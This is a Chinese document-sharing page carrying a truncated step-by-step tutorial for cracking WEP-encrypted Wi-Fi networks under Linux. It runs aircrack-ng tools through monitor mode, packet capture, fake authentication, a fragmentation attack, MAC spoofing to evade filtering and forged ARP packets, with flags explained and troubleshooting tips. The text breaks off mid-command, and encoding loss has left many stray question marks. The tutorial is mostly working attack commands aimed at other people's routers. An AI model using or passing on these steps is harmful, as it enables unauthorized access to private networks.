完整版-SIM.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
完整版-SIM

Linux下构包注入攻击破解WEP完整教程 卡王专用版 SIMMAXCN E生活网络装备 ??????????????????????????????????????? 准备工作: 在windows下安装好卡王驱动,点“可用连接”扫描附近的无线路由信息,记下你需要破解的SSID,频道,MAC地址(ESSID) 重启电脑,设置U盘或光盘启动 按delete 进入 BIOS ----Advanced BIOS Features----First Boot Device----USB zip ? ??????????????????????????????????????????Second Boot Device----CDrom 按F10----回车 保存设置并重启进入 LINUX 开始破解. 可使用 ↑↓ 箭头按钮找回曾经输入过的命令。 ? 1 打开一个窗口,就是左下角第二个黑色图标,输入: ifconfig? -a ??查看网卡,命令之间只有一个空格,下同,顺便核对自己网卡的MAC。 ifconfig? -a? wlan0? up ?????加载usb网卡驱动(加载这个命令无系统提示) 2 . 输入 : airmon-ng? start? wlan0? 6 ?? 激活网卡的Monitor模式 后面的6 是你要破解ap 的工作频道? 根据实际,换成你破解的ap的实际工作频道(下同)。 3 .输入 airodump-ng? --ivs? -w? 123? -c? 6? wlan0 --ivs 只抓ivs包 -w?? 写入文件名 可任意 -c??? 选择波段(频道) 其中,wlan0是你破解用的网卡接口名(下同) 回车后我们见到了airodump-ng 工作窗口,已经开始抓包了! 注意Data这个最重要的数据。大多数情况他会慢慢增长,如果一直为0则不用破了,说明此路由关了猫拔了网线没有任何数据产生,包括有线,在实战中只发现tp-link 少数型号有这现象,你可另寻时机破解(等他开猫上网) ? 4. 上面窗口不关闭,另开一个窗口,用自己的网卡连接要破解的ap,输入: aireplay-ng? -1? 0? -e? linksys? -a? 001601d18d46? -h? 0014bf7fdb2c? wlan0 -1 数字1 发送伪装连接请求 ?0 数字0 延迟 -e? ESSID?? 如果这个ESSID有空格,例如linksys one 则需使用双引号“linksys one”有的ESSID是中文,解决 ??? 办法:1。不输入-e参数,但成功率降低 2。等合法客户端出现直接使用-3破解模式????????? -a? 被破解路由MAC (替换成你要破解的) -h? 你自己网卡MAC (替换成你自己的) wlan0 你的网卡接口 这时,系统将回显 Sending Authentication Request?? Authentication successful? Sending Association Request???? Association successful :-) 代表伪连接成功 ? 不能成功的原因,具体有如下几种: 1、目标AP做了MAC地址过滤 2、你离目标AP物理距离太远 3、对方使用了WPA加密 4、网卡不支持注入 5. 网卡没有使用和AP一样的工作频道 6、输入的ssid拼写有误,请注意检查 你可以根据命令反馈消息来判断原因来尝试解决问题,比如获得一个合法的MAC并伪造MAC、留意airodump-ng 工作窗口,BSSID对应的 STATTON 就是合法用户MAC,下面是改变自己MAC 命令: ?Macchanger? --mac? wlan0? 00:11:22:33:44:55 ? 5 输入 aireplay-ng? -5? -b? 001601d18d46? -h? 0014bf7fdb2c? wlan0 -5 告诉aireplay-ng 使用fragmentation attack模式 如果 -5 不成功,可尝试使用 -4 ??? -b 被破解路由MAC?? (替换成你要破解的) ??? -h 网卡MAC? (替换成你自己的) 系统将回显? Use this packet ?? 输入y? 回车 得到一个至关重要的xor文件 ???? 6 输入 packetforge-ng? -0? -a? 001601d18d46 ?-h? 0014bf7fdb2c? -k? 255.255.255.255? -l? 255.255.255.255? -y? fragment-0302-161820.xor? -w? myarp -0 告诉packetforge-ng来产生一个arp包 -a

文档评论(0)

jgx3536 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:6111134150000003

1亿VIP精品文档

相关文档